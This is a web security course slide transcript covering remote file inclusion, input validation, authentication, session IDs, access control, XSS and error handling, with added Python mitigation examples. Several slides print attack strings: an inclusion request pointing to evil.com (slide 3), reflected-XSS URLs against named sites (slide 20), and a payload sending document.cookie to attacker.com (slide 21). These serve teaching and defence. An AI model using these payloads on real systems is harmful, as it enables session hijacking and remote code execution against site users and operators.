
CIT 380: Securing Computer Systems: Web Security

Presentation transcript:

Slide 1: Web Security (CIT 380: Securing Computer Systems)

Slide 2: Insecure Remote File Inclusion
Insecure remote file inclusion vulnerabilities allow an attacker to trick the application into executing code that the attacker hosts on another site.
Dynamic code
– Includes in PHP, Java, .NET
– DTDs for XML documents
Key idea
– The attacker controls the pathname used for inclusion.

Slide 3: PHP Remote Inclusion Flaw
A PHP product uses "require" or "include" statements, or equivalent statements, that use attacker-controlled data to identify code or HTML to be directly processed by the PHP interpreter before inclusion in the script.

    <?php
    // index.php
    include('config.php');
    include('include.php');
    // Script body
    ?>

    <?php
    // config.php
    $server_root = '/my/path';
    ?>

    <?php
    // include.php
    // If include.php is requested directly, config.php never runs, and with
    // PHP's register_globals enabled $server_root is taken from the query string.
    include($server_root . '/someotherfile.php');
    ?>

    GET /include.php?server_root=http://evil.com/command.txt

Slide 4: Mitigating Remote File Inclusion
1. Turn off remote file inclusion.
2. Do not run code from uploaded files.
3. Do not use user-supplied paths.
4. Validate all paths before loading code.
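The following Python function is added here as an illustration of mitigations 3 and 4 applied to the include.php example on slide 3; it is not part of the original slides. The caller supplies only a bare file name, which is checked against a fixed allowlist (ALLOWED_INCLUDES is a constructed list), anything carrying a URL scheme is refused, and the resolved path is confirmed to lie under the server root. Python is used instead of PHP so the checks can be run directly against the slide's attack string.

```python
import os
from urllib.parse import urlparse

# Constructed allowlist: the only files this page is permitted to include.
ALLOWED_INCLUDES = {"header.php", "footer.php", "someotherfile.php"}


def resolve_include(server_root, requested):
    """Return the absolute path to load for `requested`, or raise ValueError.

    Checks, in order: no URL scheme (blocks remote files and PHP stream
    wrappers such as php://), no directory components, exact allowlist
    match, and the resolved path still lies inside server_root.
    """
    if urlparse(requested).scheme:
        raise ValueError("remote URLs and stream wrappers are not allowed")
    if (not requested or requested != os.path.basename(requested)
            or requested in (".", "..")):
        raise ValueError("only a bare file name is accepted")
    if requested not in ALLOWED_INCLUDES:
        raise ValueError("file is not on the include allowlist")
    root = os.path.realpath(server_root)
    full = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, full]) != root:
        raise ValueError("resolved path escapes the server root")
    return full


def is_safe_include(server_root, requested):
    """True if resolve_include would accept `requested`, False otherwise."""
    try:
        resolve_include(server_root, requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: the slide's attack parameter plus a few variants.
    for candidate in ("someotherfile.php", "http://evil.com/command.txt",
                      "../../etc/passwd", "php://input", "admin.php"):
        print(f"{candidate!r:32} -> {is_safe_include('/my/path', candidate)}")
```

Mitigation 1 (turning off remote inclusion, allow_url_include in PHP) is a server setting and still belongs alongside this check; the allowlist means a new include has to be registered deliberately rather than discovered by an attacker.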

Slide 5: Unvalidated Input
Unvalidated input is an architecture flaw.
– Individual input-related bugs are easy to fix.
– How do you defend against the general problem of input-based attacks?
Key ideas
– The application needs to validate all input.
– Input validation needs to be part of the design.

Slide 6: Input Validation Solutions
All input must be validated.
Input must be validated on the server.
Use a standard set of validation rules.
Reject all input that isn't in your whitelist.
– Blacklists can miss bad inputs.
– Input repairs can produce bad input.
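Added example (not from the original slides) contrasting the two approaches on slide 6. The blacklist side strips opening script tags, the kind of "repair" the slide warns about, and a constructed input shows the repair producing exactly the tag it tried to remove. The whitelist side uses one explicit rule per field; the field names and patterns are constructed, and a field with no rule is rejected outright.

```python
import re

# Blacklist with "repair": delete anything that looks like an opening script tag.
# Constructed to show why the slide says repairs can produce bad input.
SCRIPT_OPEN = re.compile(r"<script[^>]*>", re.IGNORECASE)


def blacklist_repair(value):
    """One pass of tag stripping: the kind of fix the slide warns against."""
    return SCRIPT_OPEN.sub("", value)


# Whitelist: one explicit rule per field. Anything that does not fully match is
# rejected, and fields with no rule are rejected too. Patterns are constructed.
RULES = {
    "username": re.compile(r"[a-z0-9_]{3,16}"),
    "zipcode":  re.compile(r"[0-9]{5}"),
    "quantity": re.compile(r"[1-9][0-9]{0,2}"),
}


def validate_field(field, value):
    """True only if `value` matches the whole whitelist rule for `field`."""
    rule = RULES.get(field)
    if rule is None:
        return False
    return rule.fullmatch(value) is not None


def validate_form(form):
    """Server-side check of a whole form; returns the names of rejected fields."""
    return sorted(name for name, value in form.items()
                  if not validate_field(name, value))


if __name__ == "__main__":
    # Constructed inputs.
    print(blacklist_repair("<scr<script>ipt>"))   # the repair rebuilds a script tag
    print(validate_form({"username": "alice_01", "zipcode": "41099", "quantity": "0"}))
```

fullmatch (rather than match or search) is what makes the rule a whitelist: a trailing newline or an extra character fails the check instead of slipping past an anchored prefix.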

Slide 7: Authentication
Authentication is the process of determining a user's identity.
Key ideas
– HTTP is a stateless protocol.
– Every request must be authenticated.
– Use username/password on the first request.
– Use session IDs on subsequent requests.

Slide 8: Authentication Attacks
– Sniffing passwords
– Guessing passwords
– Identity management attacks
– Replay attacks
– Session ID fixation
– Session ID guessing

Slide 9: Identity Management Attacks
Authentication requires identity management
– User registration
– Password changes and resets
Mitigations
– Use CAPTCHAs to protect registration.
– Don't use easy-to-guess secret questions.
– Don't allow an attacker to reset the e-mail address that the new password is sent to.

Slide 10: Session ID Guessing
Do session IDs show a pattern?
– How does changing the username change the ID?
– How do session IDs change with time?
Brute forcing session IDs
– Use a program to try thousands of session IDs.
Mitigating guessing attacks
– Use a large key space (128+ bits).
– Use a cryptographically random algorithm.

Slide 11: Mitigating Authentication Attacks
Use SSL to prevent sniffing attacks.
Require strong passwords.
Use secure identity management.
Use a secure session ID mechanism.
– IDs chosen at random from a large space.
– Regenerate session IDs with each request.
– Expire session IDs in a short time.
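Added example, not from the original slides, of a session ID mechanism meeting the three bullet points above and the mitigations on slide 10: 128-bit IDs from a CSPRNG, regeneration on every request, and short expiry. It also refuses to adopt a client-presented ID at login, which is the defence against the session fixation attack listed on slide 8. The class name, the 15-minute lifetime and the injectable clock are assumptions made for the demonstration.

```python
import secrets
import time

SESSION_ID_BYTES = 16        # 128 bits of CSPRNG output, as the slide asks
SESSION_LIFETIME = 15 * 60   # seconds of life before an ID expires (constructed value)


class SessionStore:
    """Server-side session table implementing the slide's three rules."""

    def __init__(self, now=time.time):
        self._now = now            # injectable clock so expiry can be exercised
        self._sessions = {}        # session_id -> {"user": ..., "expires": ...}

    def _issue(self, user):
        # secrets, not random: unpredictable, and 16 bytes gives a 2^128 space.
        sid = secrets.token_urlsafe(SESSION_ID_BYTES)
        self._sessions[sid] = {"user": user,
                               "expires": self._now() + SESSION_LIFETIME}
        return sid

    def login(self, user, presented_sid=None):
        """Issue a fresh ID at login; never adopt one the client presented."""
        self._sessions.pop(presented_sid, None)   # discard any pre-set cookie
        return self._issue(user)

    def lookup(self, sid):
        """User for a live session, or None. Expired entries are dropped."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if entry["expires"] <= self._now():
            del self._sessions[sid]
            return None
        return entry["user"]

    def rotate(self, sid):
        """Regenerate the ID on every request; the old ID is invalid at once."""
        user = self.lookup(sid)
        if user is None:
            return None
        del self._sessions[sid]
        return self._issue(user)


if __name__ == "__main__":
    store = SessionStore()
    first = store.login("alice", presented_sid="attacker-chosen-value")
    second = store.rotate(first)
    print(first, "->", second, "| old ID still valid:", store.lookup(first) is not None)
```

Rotating on every request, as the slide suggests, means a captured ID is useful only until the legitimate user's next request; it also breaks concurrent requests from the same browser, so many deployments rotate at privilege changes (login, role change) and rely on the short expiry otherwise.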

Slide 12: Access Control
Access control determines which users have access to which system resources.
Levels of access control
– Site
– URL
– Function
– Function (parameters)
– Data

Slide 13: Mitigating Broken Access Control
1. Check every access.
2. Use a whitelist model at every layer.
3. Do not rely on client-level access control.
4. Do not rely on security through obscurity.

Slide 14: Cross-Site Scripting (XSS)
The attacker causes a legitimate web server to send user-executable content (JavaScript, Flash ActionScript) of the attacker's choosing.
XSS is used to obtain the session ID for
– a bank site (transfer money to the attacker)
– a shopping site (buy goods for the attacker)
– e-mail
Key ideas
– The attacker sends malicious code to the server.
– The victim's browser loads the code from the server and runs it.

Slide 15: XSS Attacks
MySpace worm (October 2005)
– When someone viewed Samy's profile, it set him as a friend of the viewer and incorporated the code in the viewer's profile.
PayPal (2006)
– An XSS redirect was used to steal money from PayPal users in a phishing scam.
BBC, CBS (2006)
– By following an XSS link from securitylab.ru, you could read an apparently valid story on the BBC or CBS site claiming that Bush had appointed a 9-year-old as head of the Information Security department.

Slide 16: Stored XSS
– Injected script is stored in a comment, message, etc.
– Requires the ability to insert malicious code into web documents (comments, reviews, etc.).
– Persistent until the message is deleted.

Slide 17: Reflected XSS
– Injected script is returned by a one-time message.
– Requires tricking the user into clicking on a link.
– Non-persistent: only works when the user clicks.

Slide 18: Why does XSS Work?
Same-Origin Policy
– The browser only allows JavaScript from site X to access cookies and other data from site X.
– The attacker needs to make the attack come from site X.
Vulnerable server program
– Any program that returns user input without filtering out dangerous code.

Slide 19: Anatomy of an XSS Attack
[Diagram with three parties: User, Web Server, Attacker. Steps as labelled:]
1. User logs in.
2. Web server issues a cookie.
3. Attacker delivers the XSS attack.
4. User clicks on the XSS link.
5. Browser requests the XSS URL from the web server.
6. Web server returns the page with the injected code.
7. Browser runs the injected code; the evil site saves the ID.
8. Attacker hijacks the user's session.

Slide 20: XSS URL Examples
http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="> alert(document.cookie)
http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw= alert('Test');
http://www.shopnbc.com/listing.asp?qu= alert(document.cookie) &frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=_%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

Slide 21 (March 15, 2008, SIGCSE): Exploiting the Vulnerability
1. The user logs in and is issued a cookie.
2. The attacker feeds the URL to the user:
   https://example.com/error.php?message= var+i=new+Image;+i.src="http://attacker.com/"%2bdocument.cookie;

Slide 23: Mitigating XSS
1. Disallow HTML input.
2. Allow only safe HTML tags.
3. Filter output: replace HTML special characters in the output, e.g. replace < and > with their entities (&lt; and &gt;); also replace (, ), #, &.
4. Tagged cookies: include the IP address in the cookie and only allow access from the original IP address that the cookie was created for.
5. Client: disable JavaScript, e.g. with the NoScript extension for Firefox.
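Added example (not part of the original slides) implementing mitigations 3 and 4 above. encode_output replaces every character the slide lists with an HTML entity, and the tagged-cookie pair binds a session ID to the client IP with an HMAC so that a cookie replayed from a different address fails verification. The cookie layout (session ID, a dot, then the tag), the HMAC-SHA256 choice and the per-process key are assumptions made for the demonstration.

```python
import hashlib
import hmac
import secrets

# Step 3: output filtering. Each special character the slide lists maps to an
# HTML entity; escaping character by character avoids double-encoding '&'.
HTML_ESCAPES = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
    "(": "&#x28;", ")": "&#x29;", "#": "&#x23;",
}


def encode_output(text):
    """Make untrusted text safe to place in HTML element content."""
    return "".join(HTML_ESCAPES.get(ch, ch) for ch in text)


# Step 4: tagged cookies. The cookie carries the session ID plus an HMAC over
# the ID and the client IP, so a stolen cookie replayed from another address
# fails verification. The key is generated per process here (constructed);
# a deployment would load a persistent key from configuration.
SERVER_KEY = secrets.token_bytes(32)


def _tag(session_id, client_ip, key):
    msg = f"{session_id}|{client_ip}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def make_tagged_cookie(session_id, client_ip, key=SERVER_KEY):
    """Session IDs are assumed to contain no '.', which separates ID and tag."""
    return f"{session_id}.{_tag(session_id, client_ip, key)}"


def verify_tagged_cookie(cookie, client_ip, key=SERVER_KEY):
    """Return the session ID if the tag matches this client IP, else None."""
    session_id, sep, tag = cookie.rpartition(".")
    if not sep or not session_id:
        return None
    # Constant-time comparison: the tag is a secret-derived value.
    if not hmac.compare_digest(_tag(session_id, client_ip, key), tag):
        return None
    return session_id


if __name__ == "__main__":
    print(encode_output("<script>alert(document.cookie)</script>"))
    cookie = make_tagged_cookie("abc123", "10.0.0.5")
    print(verify_tagged_cookie(cookie, "10.0.0.5"),
          verify_tagged_cookie(cookie, "10.0.0.6"))
```

Two caveats a practitioner would add: element-content escaping as above is not sufficient when untrusted data lands inside an attribute, a URL or a script block, each of which needs its own encoding; and IP-tagged cookies log out legitimate users whose address changes (mobile networks, proxy pools), so the binding is usually combined with the short session expiry from slide 11 rather than relied on alone.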

Slide 24: Improper Error Handling
Applications can unintentionally leak information about configuration, architecture, or sensitive data when handling errors improperly.
Errors can provide too much data
– Stack traces
– SQL statements
– Subsystem errors
– User typos, such as passwords

Slide 25: Example of Improper Error Handling
mySQL error with query SELECT COUNT(*) FROM nucleus_comment as c WHERE c.citem=90: Can't open file: 'nucleus_comment.MYI' (errno: 145)
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/exalt2/public_html/username/nucleus/libs/COMMENTS.php on line 124

Slide 26: Mitigating Improper Error Handling
1. Catch all exceptions.
2. Check all error codes.
3. Wrap the application with a catch-all handler.
4. Send a user-friendly message to the user.
5. Store details for debugging in log files.
6. Don't log passwords or other sensitive data.
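Added example, not from the original slides, showing steps 1 and 3 to 6 as a catch-all request wrapper: the user receives only a generic message and a reference number, while the exception, stack trace and request parameters (with secrets blanked out) go to the log under that reference. The handler signature, the reference format and the list of sensitive parameter names are assumptions made for the demonstration; the failing handler reproduces the slide 25 message as constructed input.

```python
import logging
import traceback
import uuid

log = logging.getLogger("app")

# Parameter names whose values must never reach the log (constructed list).
SENSITIVE_KEYS = {"password", "passwd", "secret", "token", "credit_card"}


def redact(params):
    """Step 6: copy of the request parameters with secrets blanked out."""
    return {k: ("[REDACTED]" if k.lower() in SENSITIVE_KEYS else v)
            for k, v in params.items()}


def handle_request(handler, params):
    """Steps 1, 3, 4, 5: catch-all wrapper around a request handler.

    Returns (status, body). On failure the body carries only a reference
    number; the exception text, stack trace and redacted parameters go to
    the log, where the reference lets an operator find them.
    """
    try:
        return 200, handler(params)
    except Exception as exc:   # deliberately broad: this is the last line of defence
        ref = uuid.uuid4().hex[:12]
        log.error("ref=%s params=%r error=%r\n%s",
                  ref, redact(params), exc, traceback.format_exc())
        return 500, f"Sorry, something went wrong. Reference: {ref}"


def failing_handler(params):
    """Constructed handler that fails the way the slide 25 example did."""
    raise RuntimeError("Can't open file: 'nucleus_comment.MYI' (errno: 145)")


if __name__ == "__main__":
    logging.basicConfig(level=logging.ERROR)
    status, body = handle_request(failing_handler,
                                  {"user": "bob", "password": "hunter2"})
    print(status, body)
```

Step 2 (checking error codes) applies to calls that report failure through a return value rather than an exception; the same wrapper works for those once the call site turns a bad code into a raised error, so every failure path ends in the single handler above.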
